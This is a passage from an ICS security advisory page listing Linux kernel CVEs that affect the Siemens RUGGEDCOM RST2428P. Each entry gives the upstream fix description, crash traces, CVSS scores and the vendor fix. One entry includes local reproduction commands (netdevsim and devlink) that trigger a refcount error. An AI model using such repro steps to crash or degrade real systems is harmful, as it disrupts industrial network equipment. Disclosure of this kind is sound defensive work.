__snmp6_fill_stats64.constprop.0+0x66/0x107 ? __nla_validate_parse+0x48/0x1e6 __rtnl_newlink+0x5ff/0xa57 ? kmem_cache_alloc_trace+0x164/0x2ce rtnl_newlink+0x44/0x6e rtnetlink_rcv_msg+0x2bb/0x362 ? __netlink_sendskb+0x4c/0x6c ? netlink_unicast+0x28f/0x2ce ? rtnl_calcit.isra.0+0x150/0x146 netlink_rcv_skb+0x5f/0x112 netlink_unicast+0x213/0x2ce netlink_sendmsg+0x24f/0x4d9 __sock_sendmsg+0x65/0x6a ____sys_sendmsg+0x28f/0x2c9 ? import_iovec+0x17/0x2b ___sys_sendmsg+0x97/0xe0 __sys_sendmsg+0x81/0xd8 do_syscall_64+0x35/0x87 entry_SYSCALL_64_after_hwframe+0x6e/0x0 RIP: 0033:0x7fc328603727 Code: c3 66 90 41 54 41 89 d4 55 48 89 f5 53 89 fb 48 83 ec 10 e8 0b ed ff ff 44 89 e2 48 89 ee 89 df 41 89 c0 b8 2e 00 00 00 0f 05 &lt;48&gt; 3d 00 f0 ff ff 77 35 44 89 c7 48 89 44 24 08 e8 44 ed ff ff 48 RSP: 002b:00007ffe8eb3f1a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007fc328603727 RDX: 0000000000000000 RSI: 00007ffe8eb3f1f0 RDI: 000000000000000d RBP: 00007ffe8eb3f1f0 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000 R13: 00000000000 ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40250">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40251</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy The function devl_rate_nodes_destroy is documented to "Unset parent for all rate objects". However, it was only calling the driver-specific `rate_leaf_parent_set` or `rate_node_parent_set` ops and decrementing the parent's refcount, without actually setting the `devlink_rate-&gt;parent` pointer to NULL. This leaves a dangling pointer in the `devlink_rate` struct, which cause refcount error in netdevsim[1] and mlx5[2]. In addition, this is inconsistent with the behavior of `devlink_nl_rate_parent_node_set`, where the parent pointer is correctly cleared. This patch fixes the issue by explicitly setting `devlink_rate-&gt;parent` to NULL after notifying the driver, thus fulfilling the function's documented behavior for all rate objects. [1] repro steps: echo 1 &gt; /sys/bus/netdevsim/new_device devlink dev eswitch set netdevsim/netdevsim1 mode switchdev echo 1 &gt; /sys/bus/netdevsim/devices/netdevsim1/sriov_numvfs devlink port function rate add netdevsim/netdevsim1/test_node devlink port function rate set netdevsim/netdevsim1/128 parent test_node echo 1 &gt; /sys/bus/netdevsim/del_device dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 8 PID: 1530 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 8 UID: 0 PID: 1530 Comm: bash Not tainted 6.18.0-rc4+ #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: devl_rate_leaf_destroy+0x8d/0x90 __nsim_dev_port_del+0x6c/0x70 [netdevsim] nsim_dev_reload_destroy+0x11c/0x140 [netdevsim] nsim_drv_remove+0x2b/0xb0 [netdevsim] device_release_driver_internal+0x194/0x1f0 bus_remove_device+0xc6/0x130 device_del+0x159/0x3c0 device_unregister+0x1a/0x60 del_device_store+0x111/0x170 [netdevsim] kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x55/0x10f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 [2] devlink dev eswitch set pci/0000:08:00.0 mode switchdev devlink port add pci/0000:08:00.0 flavour pcisf pfnum 0 sfnum 1000 devlink port function rate add pci/0000:08:00.0/group1 devlink port function rate set pci/0000:08:00.0/32768 parent group1 modprobe -r mlx5_ib mlx5_fwctl mlx5_core dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 7 PID: 16151 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 7 UID: 0 PID: 16151 Comm: bash Not tainted 6.17.0-rc7_for_upstream_min_debug_2025_10_02_12_44 #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: devl_rate_leaf_destroy+0x8d/0x90 mlx5_esw_offloads_devlink_port_unregister+0x33/0x60 [mlx5_core] mlx5_esw_offloads_unload_rep+0x3f/0x50 [mlx5_core] mlx5_eswitch_unload_sf_vport+0x40/0x90 [mlx5_core] mlx5_sf_esw_event+0xc4/0x120 [mlx5_core] notifier_call_chain+0x33/0xa0 blocking_notifier_call_chain+0x3b/0x50 mlx5_eswitch_disable_locked+0x50/0x110 [mlx5_core] mlx5_eswitch_disable+0x63/0x90 [mlx5_core] mlx5_unload+0x1d/0x170 [mlx5_core] mlx5_uninit_one+0xa2/0x130 [mlx5_core] remove_one+0x78/0xd0 [mlx5_core] pci_device_remove+0x39/0xa0 device_release_driver_internal+0x194/0x1f0 unbind_store+0x99/0xa0 kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x53/0x1f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40251">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40252</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() The loops in 'qede_tpa_cont()' and 'qede_tpa_end()', iterate over 'cqe-&gt;len_list[]' using only a zero-length terminator as the stopping condition. If the terminator was missing or malformed, the loop could run past the end of the fixed-size array. Add an explicit bound check using ARRAY_SIZE() in both loops to prevent a potential out-of-bounds access. Found by Linux Verification Center (linuxtesting.org) with SVACE.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40252">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40254</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: remove never-working support for setting nsh fields The validation of the set(nsh(...)) action is completely wrong. It runs through the nsh_key_put_from_nlattr() function that is the same function that validates NSH keys for the flow match and the push_nsh() action. However, the set(nsh(...)) has a very different memory layout. Nested attributes in there are doubled in size in case of the masked set(). That makes proper validation impossible. There is also confusion in the code between the 'masked' flag, that says that the nested attributes are doubled in size containing both the value and the mask, and the 'is_mask' that says that the value we're parsing is the mask. This is causing kernel crash on trying to write into mask part of the match with SW_FLOW_KEY_PUT() during validation, while validate_nsh() doesn't allocate any memory for it: BUG: kernel NULL pointer dereference, address: 0000000000000018 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary) RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch] Call Trace: validate_nsh+0x60/0x90 [openvswitch] validate_set.constprop.0+0x270/0x3c0 [openvswitch] __ovs_nla_copy_actions+0x477/0x860 [openvswitch] ovs_nla_copy_actions+0x8d/0x100 [openvswitch] ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch] genl_family_rcv_msg_doit+0xdb/0x130 genl_family_rcv_msg+0x14b/0x220 genl_rcv_msg+0x47/0xa0 netlink_rcv_skb+0x53/0x100 genl_rcv+0x24/0x40 netlink_unicast+0x280/0x3b0 netlink_sendmsg+0x1f7/0x430 ____sys_sendmsg+0x36b/0x3a0 ___sys_sendmsg+0x87/0xd0 __sys_sendmsg+0x6d/0xd0 do_syscall_64+0x7b/0x2c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The third issue with this process is that while trying to convert the non-masked set into masked one, validate_set() copies and doubles the size of the OVS_KEY_ATTR_NSH as if it didn't have any nested attributes. It should be copying each nested attribute and doubling them in size independently. And the process must be properly reversed during the conversion back from masked to a non-masked variant during the flow dump. In the end, the only two outcomes of trying to use this action are either validation failure or a kernel crash. And if somehow someone manages to install a flow with such an action, it will most definitely not do what it is supposed to, since all the keys and the masks are mixed up. Fixing all the issues is a complex task as it requires re-writing most of the validation code. Given that and the fact that this functionality never worked since introduction, let's just remove it altogether. It's better to re-introduce it later with a proper implementation instead of trying to fix it in stable releases.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40254">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40257</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix a race in mptcp_pm_del_add_timer() mptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, &amp;entry-&gt;add_timer) while another might have free entry already, as reported by syzbot. Add RCU protection to fix this issue. Also change confusing add_timer variable with stop_timer boolean. syzbot report: BUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 Read of size 4 at addr ffff8880311e4150 by task kworker/1:1/44 CPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Workqueue: events mptcp_worker Call Trace: dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631 mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362 mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174 tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361 tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441 tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931 tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374 ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 __netif_receive_skb_one_core net/core/dev.c:6079 [inline] __netif_receive_skb+0x143/0x380 net/core/dev.c:6192 process_backlog+0x31e/0x900 net/core/dev.c:6544 __napi_poll+0xb6/0x540 net/core/dev.c:7594 napi_poll net/core/dev.c:7657 [inline] net_rx_action+0x5f7/0xda0 net/core/dev.c:7784 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302 mptcp_pm_send_ack net/mptcp/pm.c:210 [inline] mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1 mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Allocated by task 44: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:400 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417 kasan_kmalloc include/linux/kasan.h:262 [inline] __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748 kmalloc_noprof include/linux/slab.h:957 [inline] mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385 mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355 mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline] __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529 mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Freed by task 6630: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587 kasan_save_free_info mm/kasan/kasan.h:406 [inline] poison_slab_object m ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40257">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40258</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix race condition in mptcp_schedule_work() syzbot reported use-after-free in mptcp_schedule_work() [1] Issue here is that mptcp_schedule_work() schedules a work, then gets a refcount on sk-&gt;sk_refcnt if the work was scheduled. This refcount will be released by mptcp_worker(). [A] if (schedule_work(...)) { [B] sock_hold(sk); return true; } Problem is that mptcp_worker() can run immediately and complete before [B] We need instead : sock_hold(sk); if (schedule_work(...)) return true; sock_put(sk); [1] refcount_t: addition on 0; use-after-free. WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25 Call Trace: __refcount_add include/linux/refcount.h:-1 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] sock_hold include/net/sock.h:816 [inline] mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943 mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316 call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747 expire_timers kernel/time/timer.c:1798 [inline] __run_timers kernel/time/timer.c:2372 [inline] __run_timer_base+0x648/0x970 kernel/time/timer.c:2384 run_timer_base kernel/time/timer.c:2393 [inline] run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] run_ktimerd+0xcf/0x190 kernel/softirq.c:1138 smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40258">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40261</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nvme: nvme-fc: Ensure -&gt;ioerr_work is cancelled in nvme_fc_delete_ctrl() nvme_fc_delete_assocation() waits for pending I/O to complete before returning, and an error can cause -&gt;ioerr_work to be queued after cancel_work_sync() had been called. Move the call to cancel_work_sync() to be after nvme_fc_delete_association() to ensure -&gt;ioerr_work is not running when the nvme_fc_ctrl object is freed. Otherwise the following can occur: [ 1135.911754] list_del corruption, ff2d24c8093f31f8-&gt;next is NULL [ 1135.917705] ------------[ cut here ]------------ [ 1135.922336] kernel BUG at lib/list_debug.c:52! [ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary) [ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025 [ 1135.950969] Workqueue: 0x0 (nvme-wq) [ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f [ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff &lt;0f&gt; 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b [ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046 [ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000 [ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0 [ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08 [ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100 [ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0 [ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000 [ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0 [ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 1136.055910] PKRU: 55555554 [ 1136.058623] Call Trace: [ 1136.061074] [ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.071898] ? move_linked_works+0x4a/0xa0 [ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.081744] ? __die_body.cold+0x8/0x12 [ 1136.085584] ? die+0x2e/0x50 [ 1136.088469] ? do_trap+0xca/0x110 [ 1136.091789] ? do_error_trap+0x65/0x80 [ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.101289] ? exc_invalid_op+0x50/0x70 [ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20 [ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.120806] move_linked_works+0x4a/0xa0 [ 1136.124733] worker_thread+0x216/0x3a0 [ 1136.128485] ? __pfx_worker_thread+0x10/0x10 [ 1136.132758] kthread+0xfa/0x240 [ 1136.135904] ? __pfx_kthread+0x10/0x10 [ 1136.139657] ret_from_fork+0x31/0x50 [ 1136.143236] ? __pfx_kthread+0x10/0x10 [ 1136.146988] ret_from_fork_asm+0x1a/0x30 [ 1136.150915]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40261">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1341.html">CWE-1341 Multiple Releases of Same Resource or Handle</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
